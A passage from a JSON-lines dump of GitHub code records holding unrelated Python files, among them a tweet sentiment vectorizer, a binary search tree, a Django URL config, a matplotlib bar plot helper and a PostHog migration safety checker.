ignore_index=True)\r\n full_featureset.append(everytweet_featureset)\r\n\r\n df=df.replace(np.nan, 0)\r\n num_array= df.to_numpy()\r\n\r\n normed_matrix = normalize(num_array)\r\n\r\n return normed_matrix\r\n\r\ndef getnewst(setoftweets):\r\n\r\n edges=dict()\r\n for each_tweet in setoftweets:\r\n each_tweet=each_tweet.split()\r\n\r\n for i in range(0, len(each_tweet)-1):\r\n if (each_tweet[i], each_tweet[i+1]) in edges.keys():\r\n edges[(each_tweet[i], each_tweet[i+1])]= edges[(each_tweet[i], each_tweet[i+1])]+1\r\n\r\n else:\r\n edges[(each_tweet[i], each_tweet[i+1])]=1\r\n\r\n\r\n G=nx.Graph()\r\n for (u,v),w in edges.items():\r\n G.add_edge(u,v,weight=w)\r\n\r\n\r\n\r\n newresults_S=dict(G.degree(weight='weight'))\r\n newresults_k=dict(G.degree())\r\n clust=nx.clustering(G)\r\n selectivity_dict=dict()\r\n for each_node in G.nodes():\r\n selectivity_dict[each_node]=(float)((float)(newresults_S[each_node])/(float)(newresults_k[each_node]))*(math.log(newresults_k[each_node]))\r\n\r\n edge_score=dict()\r\n for (u,v) in G.edges():\r\n try:\r\n ew=edges[(u,v)]\r\n except:\r\n ew=edges[(v,u)]\r\n es=(float)((float)(ew)/(float)(G.degree(u)+G.degree(v)-ew))\r\n\r\n edge_score[(u,v)]=(float)(math.log(ew)*(float)(es))\r\n\r\n results_unigram = sorted(selectivity_dict.items(),key=operator.itemgetter(1),reverse=True)\r\n results_bigram = sorted(edge_score.items(),key=operator.itemgetter(1),reverse=True)\r\n\r\n\r\n feature_value_uni=dict()\r\n for each_unigram in selectivity_dict.keys():\r\n if selectivity_dict[each_unigram]>1:\r\n feature_value_uni[each_unigram]=selectivity_dict[each_unigram]\r\n\r\n print(type(feature_value_uni))\r\n\r\n max_val=max(feature_value_uni.values())\r\n\r\n feature_dict=dict()\r\n for k,v in feature_value_uni.items():\r\n feature_dict[k]=(float)(((float)(v))/(max_val))\r\n\r\n feature_value_uni=feature_dict\r\n\r\n feature_value_bi=dict()\r\n for (u,v) in edge_score.keys():\r\n if edge_score[(u,v)]>0.0:\r\n bigram_str=str(u+' '+v)\r\n feature_value_bi[bigram_str]=edge_score[(u,v)]\r\n\r\n max_val=max(feature_value_bi.values())\r\n\r\n feature_dict=dict()\r\n for k,v in feature_value_bi.items():\r\n feature_dict[k]=(float)(((float)(v))/(max_val))\r\n\r\n feature_value_bi=feature_dict\r\n\r\n all_features=dict()\r\n for k,v in feature_value_uni.items():\r\n all_features[k]=str(v)\r\n\r\n for k,v in feature_value_bi.items():\r\n all_features[k]=str(v)\r\n\r\n df = 
pd.DataFrame(columns=all_features.keys())\r\n print(df)\r\n\r\n features_setoftweets=[]\r\n for anything in setoftweets:\r\n listofwords=anything.split()\r\n each_tweet_1=anything.split()\r\n\r\n for i in range(0, len(each_tweet_1)-1):\r\n listofwords.append(str(each_tweet_1[i]+' '+ each_tweet_1[i+1]))\r\n features_setoftweets.append(listofwords)\r\n\r\n\r\n\r\n full_featureset=[]\r\n for each_feature in features_setoftweets:\r\n everytweet_featureset=dict()\r\n for each_word in each_feature:\r\n\r\n temp_each_word=each_word.split()\r\n\r\n if len(temp_each_word)==1:\r\n try:\r\n everytweet_featureset[each_word]=feature_value_uni[each_word]\r\n except:\r\n continue\r\n if len(temp_each_word)==2:\r\n\r\n try:\r\n everytweet_featureset[each_word]=feature_value_bi[str(each_word)]\r\n except:\r\n continue\r\n\r\n df=df.append(everytweet_featureset, ignore_index=True)\r\n\r\n full_featureset.append(everytweet_featureset)\r\n\r\n df=df.replace(np.nan, 0)\r\n num_array= df.to_numpy()\r\n\r\n normed_matrix = normalize(num_array)\r\n\r\n print(normed_matrix)\r\n\r\n return normed_matrix, all_features\r\ndef main():\r\n pass\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\nTweetID_file=pd.read_csv('amazon_cells_labelled.txt', sep=\"\\t\", header=None, names=['text','category'])\r\n\r\n\r\ncorpus=pd.DataFrame(TweetID_file,columns= ['text','category'])\r\n\r\n\r\nX_array=list(corpus['text'])\r\nY_array=list(corpus['category'])\r\n\r\n\r\nsetoftweets=[]\r\n\r\nmaintain_sentiments_dict=dict()\r\nstopwords_english = stopwords.words('english')\r\ntotal=len(corpus['text'])\r\nporter=PS()\r\n\r\n\r\nfor j in range(0,total):\r\n each_element=str(corpus['text'][j])\r\n\r\n temp_processed_tweet=each_element.split()\r\n tweets_clean=[]\r\n result=list(nltk.pos_tag(temp_processed_tweet))\r\n\r\n for (eachword,val) in result:\r\n # if( val == 'VB' or val=='ADJ' or val == 'ADV'):\r\n # eachword=porter.stem(eachword)\r\n eachword=eachword.lower()\r\n eachword=eachword.replace(\".\", \" \")\r\n eachword=eachword.replace(\"!\", \" \")\r\n eachword=eachword.replace(\",\", \" \")\r\n eachword=eachword.replace(\"-\", \" \")\r\n\r\n if (eachword not in stopwords_english): # remove stopwords\r\n\r\n tweets_clean.append(eachword)\r\n string = ' '.join(tweets_clean)\r\n setoftweets.append(string)\r\n\r\nX_train, X_test, y_train, y_test = train_test_split(setoftweets, Y_array, test_size = 0.25, random_state=42)\r\n\r\n\r\nX_train, all_features=getnewst(X_train)\r\n\r\nX_test=do_transform(X_test, all_features)\r\n\r\n\r\n##X_array=list(setoftweets)\r\n##\r\n##\r\n###tfidf = TfidfVectorizer(min_df=2, max_df=0.5, ngram_range=(1, 2))\r\n##tfidf = CountVectorizer(min_df=2, max_df=0.5, ngram_range=(1, 2))\r\n##X_train = tfidf.fit_transform(X_train)\r\n##\r\n##\r\n##\r\n##df=pd.DataFrame(\r\n## X_train.todense(),\r\n## columns=tfidf.get_feature_names()\r\n##)\r\n##\r\n##\r\n##X_test=tfidf.transform(X_test)\r\n##\r\n###X_train_enc, X_test_enc = X_train, X_test\r\n### prepare output data\r\n##y_train_enc, y_test_enc = prepare_targets(y_train, y_test)\r\n##\r\n##\r\n### feature selection\r\n##X_train_fs, X_test_fs, fs = select_features(X_train, y_train, X_test)\r\n##\r\n\r\nlogreg = LogisticRegression(C=1)\r\nlogreg.fit(X_train, y_train)\r\n\r\nprint (\"Accuracy is %s\" % ( accuracy_score(y_test, logreg.predict(X_test))))\r\n\r\nY_predict=logreg.predict(X_test)\r\nget_confusion_matrix=confusion_matrix(y_test, Y_predict, 
labels=[0,1])\r\nprint(get_confusion_matrix)\r\n\r\ntarget=[0,1]\r\nprint(classification_report(y_test, Y_predict))","repo_name":"drmuskangarg/UBIS","sub_path":"GowVectorizer.py","file_name":"GowVectorizer.py","file_ext":"py","file_size_in_byte":9115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"12880657443","text":"maxKey = 30\nimport numpy as np\nimport bentuk\nfrom random import randint\nfrom transformasi import rotasi,rotasiY,dilate\n# Program settings\nclass config:\n # Static Variable\n # GUI size\n width, height = 1000, 1000\n #Program running flag\n jalan = True\n # minimum and maximum X,Y,Z coordinate values\n minX, maxX = -int(width/2), int(width/2)\n minY, maxY = minX, maxX\n minZ, maxZ = minX, maxX\n # 2D / 3D\n is3D = True\n # Initial orthogonal values\n curMinX, curMaxX, curMinY, curMaxY, curMinZ, curMaxZ = -10, 10, -10, 10, -10, 10\n # Camera values\n camX2D, camY2D,camZ2D = 0.0,0.0,5.0\n camX3D, camY3D, camZ3D = 5.0,5.0,5.0\n # Camera vector\n vecCam3D = np.mat([[camX3D,camY3D,camZ3D,1]])\n #tegakLurus (perpendicular) = projection of the camera vector, then rotated 90 degrees counterclockwise\n tegakLurusCam3D = np.mat([[camX3D,0,camZ3D,1]]) * rotasiY(90)\n # Grid color values\n xy, xz,yz = [[255 for i in range(3)] for i in range(3)]#[[randint(0,255)/255 for color in range(3)] for i in range(3)]\n # Grid size\n banyakGrid = 40\n # Navigation\n navX, navY, navZ, navZoom = 1, 1, 1, 1.1\n navPutar = 5\n #Animation\n maxKeyFrame = maxKey\n #Default Object\n objTest = bentuk.objek(is3D)\n listOfVertex = []\n default = True\n def initAwal(is3D,listOfVertex=[],default=True):\n config.is3D = is3D\n config.listOfVertex = listOfVertex\n config.default = default\n config.objTest = bentuk.objek(is3D,listOfVertex,default)\n\n def reset():\n config.vecCam3D = np.mat([[config.camX3D,config.camY3D,config.camZ3D,1]])\n config.tegakLurusCam3D = np.mat([[config.camX3D,0,config.camZ3D,1]]) * rotasiY(90)\n config.objTest = bentuk.objek(config.is3D,config.listOfVertex,config.default)\n\n def putarCamY(derajat):\n #Rotate the 3D camera vector around the positive Y axis\n config.vecCam3D *= rotasiY(derajat)\n config.tegakLurusCam3D *= rotasiY(derajat)\n def putarCam(derajat,vx,vy,vz):\n config.vecCam3D *= rotasi(derajat,vx,vy,vz)\n def zoomCam(k):\n config.vecCam3D *= dilate(k,config.is3D)\n","repo_name":"AdityaPutraS/Tubes-Algeo-2","sub_path":"src/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"22979404335","text":"#!/usr/bin/python\n\nimport spidev\nimport sys\n\n# First byte is ignored (slave returns 0xEE)\nmsg = [ 0x00, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80 ]\n\nspi = spidev.SpiDev()\nspi.open(0,1)\nspi.mode = 0b00\nspi.max_speed_hz = 10000000\nspi.bits_per_word = 8\n\nresp = spi.xfer(msg)\n\noutput = []\nfor i in resp:\n output.append(hex(i))\nprint(output)\n","repo_name":"eigenform/metagecko","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"38641071220","text":"# 3. Write a program that asks the user to enter a value n, and then computes (1 + 1/2 + 1/3 + ... + 1/n) −\n# ln(n). 
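The `select_features` helper in the GowVectorizer script above wraps sklearn's chi-squared filter. A minimal self-contained sketch of the same call on synthetic count data; note that `chi2` requires non-negative inputs:

```python
# Minimal sketch of the chi2 feature selection used in select_features above;
# the counts are synthetic, and chi2 requires non-negative features.
import numpy as np
from sklearn.feature_selection import SelectKBest, chi2

X = np.random.randint(0, 5, size=(20, 10))   # e.g. term counts
y = np.random.randint(0, 2, size=20)

fs = SelectKBest(score_func=chi2, k=3)
X_new = fs.fit_transform(X, y)
print(X_new.shape)                    # (20, 3)
print(fs.get_support(indices=True))   # indices of the kept columns
```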
The ln function is 'log' in the 'math' module.\n\nfrom math import log\n\nn = eval(input('Enter a value: '))\n\nanswer = 0\nfor i in range(1, n + 1):\n answer += 1 / i\nanswer -= log(n)\n\nprint(answer)\n","repo_name":"ahr9n/awesome-reading","sub_path":"a-practical-introduction-to-python-programming-brian-heinold/chapter-05/exercise-03.py","file_name":"exercise-03.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"53"}
{"seq_id":"38584196508","text":"class bst:\r\n def __init__(self,data):\r\n self.data=data\r\n self.lefttree=None\r\n self.righttree=None\r\n\r\n def insert(self,data):\r\n if self.data is None:\r\n self.data=data\r\n return\r\n if self.data==data:\r\n return\r\n if self.data>data:\r\n if self.lefttree is None:\r\n self.lefttree=bst(data)\r\n else:\r\n self.lefttree.insert(data)\r\n else:\r\n if self.righttree is None:\r\n self.righttree=bst(data)\r\n else:\r\n self.righttree.insert(data)\r\n\r\n def search(self,data):\r\n if self.data is None:\r\n print(\"tree has no value\")\r\n return\r\n if self.data==data:\r\n print(\"element is found\")\r\n return\r\n if self.data>data:\r\n if self.lefttree is None:\r\n print(\"element is not found\")\r\n else:\r\n self.lefttree.search(data)\r\n else:\r\n if self.righttree is None:\r\n print(\"element is not found\")\r\n else:\r\n self.righttree.search(data)\r\n def preorder(self):\r\n print(self.data,\"\",end=\"\")\r\n if self.lefttree is not None:\r\n self.lefttree.preorder()\r\n if self.righttree is not None:\r\n self.righttree.preorder()\r\n\r\n def inorder(self):\r\n if self.lefttree is not None:\r\n self.lefttree.inorder()\r\n print(self.data,\"\",end=\"\")\r\n if self.righttree is not None:\r\n self.righttree.inorder()\r\n\r\n def postorder(self):\r\n if self.lefttree is not None:\r\n self.lefttree.postorder()\r\n if self.righttree is not None:\r\n self.righttree.postorder()\r\n print(self.data,\"\",end=\"\")\r\n def delete(self,data):\r\n if self.data is None:\r\n print(\"tree is empty\")\r\n return\r\n if self.data>data:\r\n if self.lefttree is None:\r\n print(\"element is not present\")\r\n else:\r\n self.lefttree=self.lefttree.delete(data)\r\n elif self.data< data:\r\n if self.righttree is None:\r\n print(\"element is not present\")\r\n else:\r\n self.righttree=self.righttree.delete(data)\r\n else:\r\n if self.lefttree is None:\r\n temp=self.righttree\r\n self.data=None\r\n return temp\r\n if self.righttree is None:\r\n temp=self.lefttree\r\n self.data=None\r\n return temp\r\n node=self.righttree\r\n while node.lefttree is not None:\r\n node=node.lefttree\r\n self.data=node.data\r\n self.righttree=self.righttree.delete(node.data)\r\n return self\r\ndef count(node):\r\n if node is None:\r\n return 0\r\n return 1+count(node.lefttree)+count(node.righttree)\r\nroot=bst(None)\r\nlist=[5,75,25,24,4,1,3]\r\nfor x in list:\r\n root.insert(x)\r\nprint(\"the number of elements in the tree is:\",count(root))\r\nif count(root)>1:\r\n root.delete(24)\r\nelse:\r\n print(\"cannot perform delete operation\")\r\nprint(\"preorder traversal \")\r\nroot.preorder()\r\nprint(\" inorder traversal\")\r\nroot.inorder()\r\nprint(\"post order \")\r\nroot.postorder()","repo_name":"abhaymanhas19/Datastructures-pythonprograms","sub_path":"binary search tree.py","file_name":"binary search tree.py","file_ext":"py","file_size_in_byte":3322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"9788674666","text":"from 
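For large n, the value printed by the exercise above approaches the Euler–Mascheroni constant; this is a standard fact not stated in the source:

```latex
\[
  \lim_{n \to \infty} \Bigl( \sum_{k=1}^{n} \frac{1}{k} - \ln n \Bigr)
  = \gamma \approx 0.5772156649
\]
```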
comandor.log import log, FORMAT, DATEFMT\nfrom comandor.models import Setting\n\nfrom pydantic import ValidationError\nfrom typing import List\n\nimport yaml\nimport json\nimport sys\nimport os\n\n\ndef loadSetting(file: str = \".comandor\") -> Setting:\n if not os.path.exists(file):\n raise Exception(f\"Config file not found! {file}\")\n\n setting: Setting\n\n with open(file, \"r\") as f:\n try:\n op = json.load(f)\n\n except json.JSONDecodeError as e:\n\n with open(file, \"r\") as f:\n try:\n op = yaml.safe_load(f)\n\n except yaml.error.YAMLError as err:\n log.error(\"parse config error\", e, err)\n raise\n\n try:\n setting = Setting(**op)\n except ValidationError as e:\n log.error(e)\n raise e\n\n return setting\n\n\ndef newConfig(\n logfile: str, config: str,\n debug: bool, skip: str) -> Setting:\n\n setting: Setting = loadSetting(config)\n level: int = log.INFO\n handlers: List = []\n\n if debug or setting.debug:\n level = log.DEBUG\n\n if logfile or setting.logfile:\n filename = logfile or str(setting.logfile)\n filemode = \"a\"\n handlers = [\n log.FileHandler(filename, filemode),\n log.StreamHandler(sys.stdout)\n ]\n\n log.basicConfig(\n level=level,\n format=FORMAT,\n datefmt=DATEFMT,\n handlers=handlers)\n\n if debug or setting.debug:\n log.debug(\"run debug mode!\")\n\n if skip != \"\":\n log.warn(f\"remove action with this match: {skip}\")\n for ac in setting.actions:\n if ac.action_name.find(skip) != -1:\n setting.actions.remove(ac)\n\n log.debug(\"logger configured!\")\n log.debug(\"loaded Setting!\")\n return setting\n\n\n__all__ = [\n \"newConfig\",\n \"Setting\",\n]\n","repo_name":"NoobforAl/comandor","sub_path":"comandor/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"25816184136","text":"from cProfile import label\nimport os, sys\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as ticker\nimport matplotlib.patches as mpl_patches\n\nfrom pyearth.system.define_global_variables import *\n\nfrom pyearth.visual.color.create_diverge_rgb_color_hex import create_diverge_rgb_color_hex\n\ndef barplot_data_with_reference(aData_in,\\\n aLabel_x_in,\\\n aLabel_y_in,\\\n sFilename_out,\\\n aLabel_z_in=None,\\\n aData_reference_in=None,\\\n aLabel_legend_reference_in=None,\\\n iDPI_in = None,\\\n iFlag_scientific_notation_in=None,\\\n ncolumn_in = None,\\\n iSize_x_in = None, \\\n iSize_y_in = None, \\\n dMax_y_in = None, \\\n dMin_y_in = None, \\\n dSpace_y_in = None,\\\n aMarker_in = None,\\\n aColor_in = None,\\\n aHatch_in = None,\\\n sLabel_info_in = None,\\\n sLabel_y_in = None, \\\n \n aLinestyle_in = None,\\\n aLocation_legend_in =None,\\\n sFormat_y_in =None,\\\n sLocation_legend_in=None,\\\n sTitle_in = None):\n\n aData_in = np.array(aData_in)\n aData_reference_in=np.array(aData_reference_in)\n pShape = aData_in.shape\n ndim=aData_in.ndim\n if ndim==2:\n iFlag_sub=0\n nCat= pShape[0] \n nData = pShape[1] \n \n else:\n iFlag_sub=1\n nCat= pShape[0] \n nsub=pShape[1] \n nData = pShape[2] \n\n if aData_reference_in is not None:\n iFlag_ref=1\n nData_reference=aData_reference_in.shape[0]\n\n else:\n iFlag_ref=0\n\n if iFlag_scientific_notation_in is not None:\n iFlag_scientific_notation = 1\n else:\n iFlag_scientific_notation = 0\n\n if iDPI_in is not None:\n iDPI = iDPI_in\n else:\n iDPI = 300\n\n if iSize_x_in is not None:\n iSize_x = iSize_x_in\n else:\n iSize_x = 12\n\n if iSize_y_in 
is not None:\n iSize_y = iSize_y_in\n else:\n iSize_y = 9\n\n if dMax_y_in is not None:\n dMax_y = dMax_y_in\n else:\n dMax_y = np.nanmax(aData_in) * 1.0\n\n if dMin_y_in is not None:\n dMin_y = dMin_y_in\n else:\n dMin_y = np.nanmin(aData_in) #if it has negative values, change here\n\n if (dMax_y <= dMin_y ):\n return\n\n if sLabel_y_in is not None:\n sLabel_y = sLabel_y_in\n else:\n sLabel_y = ''\n\n if sTitle_in is not None:\n sTitle = sTitle_in\n else:\n sTitle = ''\n\n if sFormat_y_in is not None:\n iFlag_format_y = 1\n sFormat_y = sFormat_y_in\n else:\n iFlag_format_y = 0\n\n if sLocation_legend_in is not None:\n sLocation_legend = sLocation_legend_in\n else:\n sLocation_legend = \"upper right\"\n\n if aLocation_legend_in is not None:\n aLocation_legend = aLocation_legend_in\n else:\n aLocation_legend=(1.0,1.0)\n\n if ncolumn_in is not None:\n ncolumn = ncolumn_in\n else:\n ncolumn = 1\n\n if aColor_in is not None:\n aColor = aColor_in\n else:\n if(nData>=3):\n aColor= create_diverge_rgb_color_hex(nData+nData_reference)\n else:\n if nData==2:\n aColor= ['red','blue']\n else:\n aColor=['red']\n\n if aHatch_in is not None:\n aHatch = aHatch_in\n else:\n aHatch= np.full(nData, '+')\n\n fig = plt.figure( dpi=iDPI )\n fig.set_figwidth( iSize_x )\n fig.set_figheight( iSize_y )\n ax = fig.add_axes([0.1, 0.5, 0.8, 0.4] )\n x = np.arange( len(aLabel_x_in) )\n dMin_x = -0.5\n dMax_x = len(aLabel_x_in)-0.5\n\n \n \n ax.set_ylabel(sLabel_y,fontsize=14)\n ax.set_title(sTitle,fontsize=14)\n ax.set_xticks(x)\n ax.set_xticklabels(aLabel_x_in)\n ax.tick_params(axis=\"x\", labelsize=15)\n ax.tick_params(axis=\"y\", labelsize=15)\n\n total_width = 0.6\n \n leg_artists = []\n aLabel=[]\n if ndim==2:\n width = total_width / (nData)\n for i in range(0, nCat,1):\n for j in np.arange(0, nData, 1):\n data1 = aData_in[j,i]\n x1 = x[i] - total_width * 0.5 + (j+0.5) * width\n rects = ax.bar( x1, data1, width, label= aLabel_y_in[j], linestyle = aLinestyle_in[j],\\\n color = aColor[j], hatch = aHatch[j], edgecolor = \"k\")\n \n pass\n if iFlag_ref ==1:\n for i in aData_reference_in:\n x0 = [-1, nData-len(aData_reference_in)]\n y0 = [aData_in[i][0], aData_in[i][0]]\n ax.plot( x0, y0, \\\n color = aColor[i], linestyle = 'dashed' ,\\\n marker = aMarker_in[i] ,\\\n label = aLabel_y_in[i]) \n else:\n width = total_width / (nData * nsub)\n if iFlag_ref ==1:\n for i in range(nData_reference):\n x0 = [-1, nCat]\n y0 = [aData_reference_in[i], aData_reference_in[i]]\n line, =ax.plot( x0, y0, \\\n color = aColor[i+nData], linestyle = 'dashed' ,\\\n marker = aMarker_in[i] ,\\\n label = aLabel_legend_reference_in[i]) \n leg_artists.append(line)\n aLabel.append(aLabel_legend_reference_in[i])\n\n for i in range(0, nCat,1):\n for j in np.arange(0, nsub, 1):\n for k in np.arange(0, nData, 1):\n data1 = aData_in[i,j,k]\n x1 = x[i] - total_width * 0.5 + j*width + k * (width *2)\n #print(x1)\n if j==0 and i==0:\n rects, = ax.bar( x1, data1, width, label= aLabel_y_in[k], linestyle = aLinestyle_in[k],\\\n color = aColor[k], hatch = aHatch[j], edgecolor = \"k\")\n leg_artists.append(rects)\n aLabel.append(aLabel_y_in[k])\n\n else:\n rects, = ax.bar( x1, data1, width, linestyle = aLinestyle_in[k],\\\n color = aColor[k], hatch = aHatch[j], edgecolor = \"k\")\n \n \n \n \n pass\n\n if iFlag_scientific_notation ==1:\n formatter = ticker.ScalarFormatter(useMathText=True)\n formatter.set_scientific(True)\n #formatter.set_powerlimits((-1,1)) # you might need to change here\n ax.yaxis.set_major_formatter(formatter)\n #most time, when you use 
scientific notation, you may not need to set the space,\n #but you may still set it using the method below\n pass\n \n\n if sLabel_info_in is not None:\n ax.text(0.1,0.9, sLabel_info_in, \\\n verticalalignment='center', horizontalalignment='left',\\\n transform=ax.transAxes, \\\n color='black', fontsize=13)\n\n if (iFlag_format_y ==1):\n ax.yaxis.set_major_formatter(ticker.FormatStrFormatter( sFormat_y ) )\n\n ax.set_xlim( dMin_x, dMax_x )\n ax.set_ylim( dMin_y, dMax_y )\n ax.grid(linewidth=1, color='gray', alpha=0.3, linestyle='--')\n\n \n #legend1= plt.legend(aBar, aLabel_y_in,\\\n # bbox_to_anchor=aLocation_legend, \\\n # loc=sLocation_legend, \\\n # fontsize=14, \\\n # ncol= ncolumn)\n \n\n if iFlag_sub==1:\n handles=list()\n #labels = []\n for i in range(nsub):\n #handles.append( \n p = mpl_patches.Rectangle((0, 0), 2, 2,hatch=aHatch[i],facecolor='w', label=aLabel_z_in[i]) # )\n \n #labels.append(aLabel_z_in[i])\n # create the legend, suppressing the blank space of the empty line symbol and the\n # padding between symbol and label by setting handlelength and handletextpad\n #legend2 = plt.legend(handles, bbox_to_anchor=(0.0,1.0), \\\n # loc='upper left', \\\n # fontsize=14, \\\n # ncol= ncolumn)\n\n leg_artists.append(p)\n aLabel.append(aLabel_z_in[i])\n \n\n \n #ax.add_artist(legend1)\n #ax.add_artist(legend2)\n ax.legend(leg_artists, aLabel, bbox_to_anchor=aLocation_legend, \\\n loc=sLocation_legend, \\\n fontsize=14, \\\n ncol= ncolumn)\n\n plt.savefig(sFilename_out, bbox_inches='tight')\n\n plt.close('all')\n plt.clf()\n\n\n return\n","repo_name":"changliao1025/pyearth","sub_path":"pyearth/visual/barplot/barplot_data_with_reference.py","file_name":"barplot_data_with_reference.py","file_ext":"py","file_size_in_byte":8627,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"}
{"seq_id":"13519142346","text":"from itertools import chain\n\n\nfiles = [\"a\", \"b\", \"c\", \"d\", \"e\", \"f\", \"g\", \"h\", \"i\", \"j\", \"k\", \"l\", \"m\", \"n\", \"o\", \"p\", \"q\", \"r\", \"s\", \"t\", \"u\", \"v\", \"w\", \"x\", \"y\", \"z\" ]\nsamples = [\"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"10\"]\n\ndef rules(ctx):\n natural(ctx)\n fast(ctx)\n\ndef natural(ctx):\n targets = [ \"natural/\" + s + \"/\" + f\n for s in samples\n for f in files ]\n ctx.add_rule(\n targets,\n [ \"input/\" + f\n for f in files ],\n [ [ \"cp\", \"input/\" + f, \"natural/\" + s ]\n for s in samples\n for f in files ] )\n\ndef fast(ctx):\n big_target = \"fast/phony\"\n ctx.add_rule(\n big_target,\n [ \"input/\" + f\n for f in files ],\n ( list( # turn the chain.iterable into a list\n chain.from_iterable( # concatenate the lists\n [ [ [ \"mkdir\", \"-p\", \"fast/\" + s ],\n [ \"cp\", \"input/\" + f, \"fast/\" + s ] ]\n for s in samples\n for f in files ] ) )\n + [[\"touch\", big_target]] ) )\n\n for s in samples:\n for f in files:\n small_target = \"fast/\" + s + \"/\" + f\n ctx.add_rule(\n small_target,\n [ big_target ],\n [ \"touch\", small_target ] ) # without this `touch`, `target`\n # would look out of date relative to its dependencies\n","repo_name":"ofiscal/tax.co","sub_path":"make.py-learning/rules.py","file_name":"rules.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"}
{"seq_id":"11219063337","text":"from django.urls import path\nfrom . 
import views\n\nurlpatterns = [\n path('register/', views.register, name='register'),\n path('login/', views.login_user, name='login'),\n path('home/', views.home, name='home'),\n path('logout/', views.logout_user, name='logout'),\n path('', views.noargs),\n path('albums/details/', views.album_details, name='album_details'),\n path('add_album/', views.add_album, name='add_album'),\n path('delete_album/', views.delete_album, name='delete_album'),\n path('add_song_to_album/', views.add_song_to_album, name='add_song_to_album'),\n path('song_details/', views.song_details, name='song_details'),\n path('delete_song/', views.delete_song, name='delete_song'),\n path('artist_details/', views.artist_details, name='artist_details'),\n path('update_artist/', views.update_artist, name='update_artist'),\n path('new_playlist', views.create_playlist, name='new_playlist'),\n path('playlist_details/', views.playlist_details, name='playlist_details'),\n path('add_song_to_playlist/', views.add_song_to_playlist, name='add_song_to_playlist'),\n path('all_albums/', views.all_albums, name='all_albums'),\n path('delete_from_playlist//', views.delete_from_playlist, name='delete_from_playlist')\n]","repo_name":"yael-orozco/django_school_project","sub_path":"app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"71888516649","text":"# Programmers: Carpet problem\n# https://school.programmers.co.kr/learn/courses/30/lessons/42842\n\ndef solution(brown, yellow):\n size = brown+yellow\n for i in range(3,size//3+1) :\n a = i\n b = size // a\n if brown == a*2 + b*2 - 4 and yellow == a*b-brown:\n return sorted([a,b], reverse = True)","repo_name":"do0134/solostudy","sub_path":"algorithm/4월/0405/4sol.py","file_name":"4sol.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"39511323879","text":"import re\nimport sys\nfrom typing import List, Optional\n\nfrom django.core.management import call_command\nfrom django.core.management.base import BaseCommand, CommandError\n\n\ndef _get_new_tables(sql: str):\n return re.findall(r'CREATE TABLE \"([a-zA-Z0-9_]*)\"', sql)\n\n\ndef _get_table(search_string: str, operation_sql: str) -> Optional[str]:\n match = re.match(r'.*{} \"([a-zA-Z0-9_]*)\"'.format(search_string), operation_sql)\n if match:\n return match[1]\n return None\n\n\ndef validate_migration_sql(sql) -> bool:\n new_tables = _get_new_tables(sql)\n operations = sql.split(\"\\n\")\n tables_created_so_far: List[str] = []\n for operation_sql in operations:\n # Extract table name from queries of this format: ALTER TABLE TABLE \"posthog_feature\"\n table_being_altered: Optional[str] = (\n re.findall(r\"ALTER TABLE \\\"([a-z_]+)\\\"\", operation_sql)[0] if \"ALTER TABLE\" in operation_sql else None\n )\n # Extract table name from queries of this format: CREATE TABLE \"posthog_feature\"\n if \"CREATE TABLE\" in operation_sql:\n table_name = re.findall(r\"CREATE TABLE \\\"([a-z_]+)\\\"\", operation_sql)[0]\n tables_created_so_far.append(table_name)\n\n if '\"id\" serial' in operation_sql:\n print(\n f\"\\n\\n\\033[91mFound a new table with an int32 id. Please use an int64 id or use UUIDModel instead.\\nSource: `{operation_sql}`\"\n )\n return True\n\n if (\n re.findall(r\"(? 1:\n print(\n f\"\\n\\n\\033[91mFound multiple migrations. 
Please scope PRs to one migration to promote easy debugging and revertability\"\n )\n sys.exit(1)\n\n for data in migrations:\n run_and_check_migration(data)\n","repo_name":"PostHog/posthog","sub_path":"posthog/management/commands/test_migrations_are_safe.py","file_name":"test_migrations_are_safe.py","file_ext":"py","file_size_in_byte":5057,"program_lang":"python","lang":"en","doc_type":"code","stars":14422,"dataset":"github-code","pt":"53"} +{"seq_id":"23725021224","text":"nota_1 = float(input('Nota 1: '))\nnota_2 = float(input('Nota 2: '))\n\nmedia = (nota_1 + nota_2) / 2\n\nprint(f'\\nTirando {nota_1:.1f} e {nota_2:.1f} a média do aluno é {media:.1f}')\n\nif media < 5:\n print('REPROVADO')\nelif 7 > media >= 5:\n print('RECUPERAÇÃO')\nelse:\n print('APROVADO')\n","repo_name":"welderessutti/exercises_and_studies","sub_path":"curso_em_video/python/ex040.py","file_name":"ex040.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22269268500","text":"class Solution:\n def isAnagram(self, s: str, t: str) -> bool:\n # base case\n if len(s)!=len(t):\n return False\n\n s=sorted(s)\n t=sorted(t)\n\n for i in range(len(s)):\n if s[i]!=t[i]:\n return False\n \n return True\n\n'''\nclass Solution:\n def isAnagram(self, s: str, t: str) -> bool:\n # base case\n if len(s)!=len(t):\n return False\n\n wordsOfS={}\n\n for word in s:\n 